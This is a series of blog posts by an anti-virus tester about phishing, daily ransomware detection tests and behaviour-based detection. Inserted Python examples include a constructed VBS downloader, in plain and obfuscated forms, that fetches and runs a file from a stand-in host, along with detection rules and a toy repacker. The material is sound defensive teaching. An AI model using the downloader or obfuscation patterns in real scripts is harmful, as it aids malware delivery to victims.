Thursday, March 15, 2018

That was a bit creepy...

So, anyway, for a variety of reasons which are not terribly important now, I decided to start using google calendar today.

First thing it did was ask if it could access my contacts. I generally say no to that sort of request, but, on this occasion, I thought, "What harm could it do?", so I clicked the OK button.

A couple of seconds later, I was shocked to find that it had populated my calendar with a couple of hundred birthdays.

Now I'm not opposed to wishing my friends a happy birthday on their special day, but some of the people in my contacts list are just business acquaintances, rather than "friends", and I would not think it appropriate to know things like that, let alone to wish them a happy birthday.

I thought, "How the heck did google know that just from a phone number or an email address? And what else do they know???"

I mean, I like google, and I consider them Good Guys, but I am concerned about the Privacy Revolution (more about that later), so with a rising sense of anxiety, I figured I'd better look at my contacts, to see if anything obvious was being leaked incorrectly.

Imagine my surprise when the first guy I looked at was not in my address book. Nor the second. Nor the third. None were in my address book. Wait ... what...???

Then I thought, "If it didn't get them from my address book, where did they come from?", and I thought... "FaceBook!!!", but then I poked around a bit, and realized that lots of them weren't friends on FaceBook either... and then, it dawned on me...

Ages ago, I'd joined google plus, but hadn't used it much, and had forgotten about it.

Yup. That's where they came from.

I was a dummy. I don't often admit it, but I was wrong.

Google calendar seems very nice.

As long as it doesn't start laughing at me...

Tuesday, February 27, 2018

Pretty good Apple phish

So, anyway, I've noticed a lot of Apple phishes coming into my email honeypots, and they're convincing enough to catch the unwary, so I thought I'd document it here a little bit. The initial email looks something like this ...

If you click the link, it takes you to this screen ...

which looks pretty convincing, unless you actually parse out the URL in the address bar, at which time you realize it ain't. If, however, you are unwise enough to put your Apple ID and password in (or, as I did, just a bogus pair), you are taken to this screen ...

Followed by this one, which is really the point of the whole thing .... they want your credit card.

The screens, unfortunately, are convincing enough that they'll probably catch a few folk. Be cautious out there. Www stands for World War Web.

Thursday, December 21, 2017

AV products do work, folks.

I see a lot of criticism of anti-virus products... they can't keep up... they miss nation-state malware... people need magical new solutions... etc. Yesterday, I tested the day's ransomware against ten products that I had readily to hand, namely, Webroot, Sophos, Avast, Symantec, Windows Defender, Panda, Avira, MalwareBytes, FProt, and Eset.

I try to do what I call Real World testing. I install products with their default options, just like an average user might. I don't specifically update the signature databases. If they update, fine. If they don't, oh well. I only use the malware of the day, rather than stuff that is a few days old (and probably extinct). I execute the malware, just as the attackers would like their victim to do, and see who detects it.

Simple, really.

Yesterday's ransomware was spread via an email, with a vbs attached. The pitch in the email is to get you to open the attachment, which executes the vbs, which then goes out to a website, and downloads and executes the ransomware.

In my testing, I simulated that by executing the vbs, and ... wait for it... nine out of the ten products nailed it, either with a generic sig, or by blocking access to the website!
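The "generic sig" that catches a script dropper like this one is usually not a hash of the attachment but a rule for the downloader idiom itself: fetch over HTTP, write the response to disk, run it. The example below is added here and is not the author's test harness or any vendor's engine; the three VBS scripts are constructed for the example (the URL is `example.invalid`), and the indicator names, thresholds and the `classify()` function are my own. It also folds the `"a" & "b"` and `Chr()` tricks that attachment writers use to split the object names, so the same rule fires on the day's re-obfuscated copy and the URL can be extracted for blocking.

```python
import re

# Constructed VBS downloader written for this example (not a real sample).
VBS_PLAIN = r'''
Set sh = CreateObject("WScript.Shell")
Set req = CreateObject("MSXML2.XMLHTTP")
req.Open "GET", "http://example.invalid/update.bin", False
req.Send
Set st = CreateObject("ADODB.Stream")
st.Open
st.Type = 1
st.Write req.ResponseBody
st.SaveToFile sh.ExpandEnvironmentStrings("%TEMP%") & "\svc.exe", 2
sh.Run sh.ExpandEnvironmentStrings("%TEMP%") & "\svc.exe", 0, False
'''

# Same logic, with the object names and URL split across literals and Chr() calls,
# which is enough to change the file hash and break a naive string match.
VBS_OBF = r'''
Set sh = CreateObject("WScr" & "ipt.Sh" & Chr(101) & "ll")
Set req = CreateObject("MSX" & "ML2.XM" & "LHTTP")
req.Open "G" & "ET", "htt" & "p://exa" & "mple.invalid/u" & "pdate.bin", False
req.Send
Set st = CreateObject("ADO" & "DB.Str" & "eam")
st.Open
st.Type = 1
st.Write req.ResponseBody
st.SaveToFile sh.ExpandEnvironmentStrings("%TEMP%") & "\svc.exe", 2
sh.Run sh.ExpandEnvironmentStrings("%TEMP%") & "\svc.exe", 0, False
'''

# A harmless admin script, to show the rule does not fire on every CreateObject().
VBS_BENIGN = r'''
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("C:\logs\backup.log", 8, True)
f.WriteLine "backup finished " & Now
f.Close
'''

# Indicators of the fetch / write-to-disk / execute chain (assumed names).
INDICATORS = {
    "http_client": re.compile(
        r'CreateObject\("(?:MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest)', re.I),
    "binary_stream": re.compile(r'CreateObject\("ADODB\.Stream"\)', re.I),
    "save_to_disk": re.compile(r'\.SaveToFile\b', re.I),
    "shell_object": re.compile(r'CreateObject\("WScript\.Shell"\)', re.I),
    "execute": re.compile(r'\.(?:Run|Exec)\b|ShellExecute', re.I),
}
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)
CHR_RE = re.compile(r'Chr\((\d+)\)', re.I)
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')


def normalize(src: str) -> str:
    """Fold Chr(n) into literals and join "a" & "b" until nothing changes,
    so split-up object names and URLs reassemble before matching."""
    s = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', src)
    prev = None
    while prev != s:
        prev = s
        s = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', s)
    return s


def classify(src: str) -> dict:
    """Generic downloader rule: fetch + write to disk + execute, regardless of
    the URL, the file hash, or how the strings were split."""
    s = normalize(src)
    hits = [name for name, rx in INDICATORS.items() if rx.search(s)]
    verdict = "downloader" if {"http_client", "save_to_disk", "execute"} <= set(hits) else "clean"
    return {"verdict": verdict, "indicators": hits, "urls": URL_RE.findall(s)}


if __name__ == "__main__":
    for label, script in (("plain", VBS_PLAIN), ("obfuscated", VBS_OBF), ("benign", VBS_BENIGN)):
        print(label, classify(script))
```

The rule deliberately ignores the URL and the payload name, which is what lets it keep firing after the attacker rotates both; the extracted URL is the second layer the post mentions, a web block that catches the same campaign even when the script itself slips through.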

This is a Good Thing (tm), and well done guys and gals.

Of course, this still doesn't answer the vexatious question of what happens when they don't have a sig, but, in the fullness of time, we will find out. I can't do this every day, but I will try to add more products to the mix, and see what happens.

Stay tuned, and keep safe.

Wednesday, October 25, 2017

BadRabbit, etc, yawn

So, anyway, the world has seen another ransomware worm, and it has been effective, and it has hurt some folks.

Guess what? It is a given that there will be more.
Here's why.
When I started in antivirus, waaaaaaay back in 1987, there were only three ways to tell if something was malicious.
(1) You saw it do something malicious
(2) You reverse engineered it, and saw it contained code that _could_ do something malicious if it wanted to, or,
(3) Someone's signature scanner _told_ you it was malicious.

The problem with the first one is that it could cause a support call. "I think this program is doing something bad. Please come and sort it out." This causes a support call, and this is anathema in a corporate environment.
The problem with the second one is that it's really hard, and takes a _lot_ of effort. Humans are essentially and inherently lazy, so no one wants to do this much.
Option three, a scanner, either blocks something, or says nuffink. The upside is that if it blocks it, all is well, and this does _not_ cause a support call, but if it's a ransomware worm, or nation-state stuff, like Duqu 2.0, it gets away, and really, really, really hurts.

Regrettably, nothing has changed, and there are still only three ways.

Waaaay back in the early 90s, corporations chose scanners, and voted with their pocketbooks.

This made a certain amount of sense, when there were only a few thousand pieces of malware, but the problem with signature scanners is that they have great difficulty seeing new things. The Bad Guys understood this, and started finding ways to make new variations of their code as frequently as possible. This is automatable, by, for example, changing a few chunks of unimportant code, or changing the packing, or the encryption algorithm, or both.
Today, we see a million new and unique pieces of malware every day.
This is a natural consequence of choosing signature scanners, back in the early 90s.
We cannot keep going like this, or one day, there will be ten million new samples every day, or a hundred million.
There is a simple-ish solution.
Detect that it's doing something malicious.
No, it's not easy, but it's smarter, and the right thing to do.
And, we testers need to stop testing scanners, once a month, against old malware that probably doesn't exist any more, and start testing how everyone detects the day's new stuff.
It's the only way forward.
Stay tuned here, folks.
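To make the repacking point above concrete, here is an added example (mine, not the author's, and not real malware): a constructed "payload" whose behaviour is just a list of named actions, a byte signature taken from it the way a signature writer would, and a one-byte XOR packer that turns out a byte-for-byte new file for every key. A scanner that matches bytes loses the family after the first repack, while a rule on what the unpacked code does keeps catching it. The payload, signature, packer format and the behaviour rule are all assumptions made for the illustration.

```python
import hashlib

# Constructed stand-in for a malware body: its "behaviour" is a list of actions.
PAYLOAD = b"enumerate files;encrypt files;delete shadow copies;drop ransom note"

# A byte signature of the kind a scanner carries for a family (assumption: taken
# from the first sample seen, as a signature writer would do).
SIGNATURE = b"encrypt files;delete shadow copies"


def sig_scan(blob: bytes) -> bool:
    """Signature scanner: matches bytes and knows nothing about meaning."""
    return SIGNATURE in blob


def repack(payload: bytes, key: int) -> bytes:
    """One-byte XOR 'packer': a tiny stub plus the XORed body. Every key yields a
    different file with a different hash that unpacks to the same payload."""
    assert 1 <= key <= 255          # key 0 would leave the bytes unchanged
    return b"STUB" + bytes([key]) + bytes(b ^ key for b in payload)


def unpack(blob: bytes) -> bytes:
    """What the stub does at run time; a static scanner never sees this result."""
    if not blob.startswith(b"STUB"):
        return blob
    key = blob[4]
    return bytes(b ^ key for b in blob[5:])


def observed_actions(blob: bytes) -> list:
    """Stand-in for a sandbox or behaviour monitor: run it, record what it does."""
    return unpack(blob).decode().split(";")


RANSOMWARE_BEHAVIOUR = {"encrypt files", "drop ransom note"}


def behaviour_scan(blob: bytes) -> bool:
    """Behaviour rule: fires on what the code does, independent of its bytes."""
    return RANSOMWARE_BEHAVIOUR <= set(observed_actions(blob))


def sha256(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def compare(n_variants: int = 50) -> dict:
    """Repack the payload n times and tally what each approach catches."""
    variants = [repack(PAYLOAD, k) for k in range(1, n_variants + 1)]
    return {
        "original_caught_by_sig": sig_scan(PAYLOAD),
        "variants_caught_by_sig": sum(sig_scan(v) for v in variants),
        "variants_caught_by_behaviour": sum(behaviour_scan(v) for v in variants),
        "distinct_hashes": len({sha256(v) for v in variants}),
    }


if __name__ == "__main__":
    print(compare())
```

Fifty keys give fifty "new, unique" samples with one line of code and no change in behaviour, which is the whole of the million-a-day problem in miniature; real packers and crypters do the same with better stubs.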

Tuesday, October 10, 2017

Less than 50% detections

Today's ransomware score... six missed (one detected stuff, but the malware encrypted the drive anyway, so that's a miss), five blocked, but with sigs... none with behavior detections.

Today's md5 is c50b81f99269bd05299df41dee8844da.

F-Secure is added to the test.

Missed were Webroot, Windows Defender, Panda, Avira, Trend.

Eset detected stuff, and removed what it saw, but the malware got away, so it's a miss.

Kaspersky, Sophos, Symantec and F-Secure blocked it with a sig.

Avast blocked it, but also blocked my software, so that's a false positive. False positives are anathema in a corporate environment, otherwise we could all use Solly's Perfect.bat, which never misses anything...

(Perfect.bat is "Echo %1 is malware"... never misses anything bad, but has a few false positives. This can be fixed, as well, which we can talk about later)

Guys... the malicious behavior with ransomware is obvious. We shouldn't be missing any of these. Please step up. I know we can do it.
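What "the malicious behavior with ransomware is obvious" looks like in a detector is the example below, added here as my own illustration rather than anything from the author's tests or a vendor's product. It walks a stream of file events (constructed for the example; no real files are touched) and flags a process that overwrites many files across several folders with ciphertext-like data, renames many files to a ransomware extension, or touches a honeyfile. The thresholds, extension list, canary path and event format are assumptions; a word processor and a backup tool writing one archive are included to show why a single high-entropy write is not enough on its own.

```python
import math
from collections import Counter, defaultdict

# Thresholds and lists are assumptions chosen for this example, not a product's settings.
ENTROPY_THRESHOLD = 7.0   # bits/byte: documents sit around 4-5, ciphertext close to 8
MIN_FILES = 5             # high-entropy rewrites (or renames) before a process is flagged
MIN_DIRS = 2              # ...spread over at least this many folders
SUSPICIOUS_EXT = {".locked", ".crypt", ".encrypted", ".enc"}
# Honeyfile: a decoy no legitimate program should ever modify (assumed path).
CANARIES = {r"C:\Users\alice\Documents\~aaa_canary.docx"}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; about 8.0 for ciphertext or compressed data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def detect(events) -> dict:
    """Walk a stream of file events and return {pid: [reasons]} for every
    process whose pattern of writes and renames looks like encryption."""
    high_entropy = defaultdict(set)   # pid -> files overwritten with ciphertext-like data
    renamed = defaultdict(set)        # pid -> files renamed to a ransomware extension
    verdicts = defaultdict(list)

    def flag(pid, reason):
        if reason not in verdicts[pid]:
            verdicts[pid].append(reason)

    for ev in events:
        pid, op, path = ev["pid"], ev["op"], ev["path"]
        if op == "write" and shannon_entropy(ev["data"]) >= ENTROPY_THRESHOLD:
            high_entropy[pid].add(path)
            folders = {p.rsplit("\\", 1)[0] for p in high_entropy[pid]}
            if len(high_entropy[pid]) >= MIN_FILES and len(folders) >= MIN_DIRS:
                flag(pid, "mass high-entropy rewrite across folders")
        elif op == "rename":
            ext = "." + ev["new_path"].rsplit(".", 1)[-1].lower()
            if ext in SUSPICIOUS_EXT:
                renamed[pid].add(path)
                if len(renamed[pid]) >= MIN_FILES:
                    flag(pid, "mass rename to ransomware extension")
        if path in CANARIES and op in ("write", "rename", "delete"):
            flag(pid, "modified honeyfile")
    return dict(verdicts)


# ---- constructed event stream for the example (no real files involved) ----
def ciphertext(n: int = 4096) -> bytes:
    # every byte value appears equally often, so entropy is exactly 8 bits/byte
    return bytes((i * 37 + 11) & 0xFF for i in range(n))


TEXT = b"Quarterly figures are attached. Please review before Friday.\n" * 60


def sample_events() -> list:
    ev = []
    # pid 100: a word processor saving one document (low entropy, one file)
    ev.append({"pid": 100, "op": "write", "path": r"C:\Users\alice\Documents\q3.docx", "data": TEXT})
    # pid 200: a backup tool writing one archive (high entropy, but a single file)
    ev.append({"pid": 200, "op": "write", "path": r"C:\Backups\2017-10-10.zip", "data": ciphertext()})
    # pid 300: ransomware walking two folders, overwriting and renaming each file
    targets = [rf"C:\Users\alice\Documents\doc{i}.docx" for i in range(4)]
    targets += sorted(CANARIES)
    targets += [rf"C:\Users\alice\Pictures\img{i}.jpg" for i in range(4)]
    for t in targets:
        ev.append({"pid": 300, "op": "read", "path": t})
        ev.append({"pid": 300, "op": "write", "path": t, "data": ciphertext()})
        ev.append({"pid": 300, "op": "rename", "path": t, "new_path": t + ".locked"})
    ev.append({"pid": 300, "op": "write", "path": r"C:\Users\alice\Documents\README_DECRYPT.txt", "data": TEXT})
    return ev


if __name__ == "__main__":
    for pid, reasons in detect(sample_events()).items():
        print(pid, reasons)
```

The three rules are independent on purpose: the entropy rule needs no knowledge of the family, the rename rule needs no sample, and the honeyfile fires on the first touch, before the file count has reached any threshold, which is the part that matters when the goal is to stop the encryption rather than to name it afterwards.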

Stay tuned.

Monday, October 9, 2017

Who caught today's ransomware?

So, as readers of my blog will know, I am trying to find out who can trap malware, without having a signature for it, and without false positives. In other words, as it executes.

For today's test, I had a piece of ransomware, that had arrived in a buddy's inbox yesterday. A quick check of its md5 on VirusTotal showed just a few sig detections.

I currently have ten products under test. They are the end-point versions of WebRoot, Kaspersky, Sophos, ESet, Avast, Symantec, Windows Defender, Panda, Avira, and Trend. I would have installed McAfee, except that it keeps barfing on one of the files it installs. It says mcmscins.dll, in the McTemp directory, is either not designed to run on Windows, or it contains an error. I tried calling their tech support about it, but the guy said he could find no record of that error. I expect this will sort itself out sometime soon, and I'll be able to add it to the test set, but that's a story for another day.

Five products missed it completely. One found a sig in memory, but it still got away, so that's really a miss. Two blocked it with a sig. Two found it with heuristics. I'll get to the names in a bit, but here's how the test works.

(1) I first run the malware on an unprotected Win7-32bit vm, and see what it does.
(2) All products are installed with default features. It is important to note that some products have extra features that can be turned on specifically to block ransomware by protecting some folders, but I am running with defaults.
(3) I don't update the signatures. The vms are only up for a minute or two, so most of the products don't have time to update, and I do that deliberately.
(4) Windows Defender is switched off in all vms, except, obviously, its own test vm.
(5) To be fair, products could also have blocked the initial downloader, or even the website that it tried to reach for the ransomware. I did not test that, as it was outside the scope of this test.

Please remember that I am not knocking signature scanners, as they are an absolutely vital layer of defense, but with greater than a million new and unique samples every day, it's not possible to add sigs for them all. Remember also that, although within a few days most scanners will have had sigs added, some malware is changing every day, and only exists for one day. The real threat is not what was around a week ago. It's what's around today.

The MD5 of the malware under test is BE499852672E9A1E5D222427978EA421.

Please also remember that just because a product misses something today, it doesn't mean it's weak. Now, if it consistently misses, day after day, that might be a different story, but the world is a safer place if everyone gets stronger. The five that missed were Webroot, Windows Defender, Avira, Panda and Trend. The one that found a sig in memory (it named it Kryptic, iirc), but it still got away, was ESet. The two that blocked it with a sig were Sophos and Avast. The two that caught it with behavior and/or heuristics, were Kaspersky and Symantec. Well done, lads. And lasses.

Let's see what tomorrow brings.

Cheers all.

Sunday, October 8, 2017

This is probably important

So, last week, I was looking at a bit of malware that was posting to This was obviously a non-existent url, so I was wondering ... why?

In the fullness of time, with a bit of help from some friends, I came to understand that it was only pretending to write to, and it was just trying to cover its tracks. This was a Dimnie variant, with a great write-up here. (Thanks Kevin. You know who you are.)

There was this write-up, and another by Symantec at about the same time, and the nub of the matter is these points:

(1) Dimnie had been around for a few years by the time it was finally noticed in March of 2017. This means it is subtle.
(2) Dimnie achieves persistence by injecting itself into running processes. It would probably go away if the computer was rebooted, but that doesn't happen often.
(3) The versions that Paloalto and Symantec saw seemed to surveil the target. They looked for what processes were running, possibly for extra vulnerabilities, that might be used later. This means nothing, right?
(4) Initial versions installed a keylogger, but the framework was sufficiently flexible that anything could be installed. The bottom line here is that if ever you let malware loose on your computer, it is no longer yours. It belongs to someone else.
Think about this...
In my initial tests, only one product blocked it by behavior.
It took three years to be noticed the first time, in March 2017. It doesn't seem to have been seen much since then, and I stumbled on it by accident.
This either means that there have been no new versions since March, or ... given that we know they are subtle, could it be that they are simply changing it every day, as with the other bit of malware that I blogged about earlier? We could well have been missing them since March.

In my opinion, given also that its primary objective sure _feels_ like surveillance, this proves that we must start focussing on non-signature malware detection. Again, I'm not knocking signature scanners... they are vital.... we simply have to do more, and it's up to us testers to focus on testing that, rather than just sigs.

Stay tuned, folks.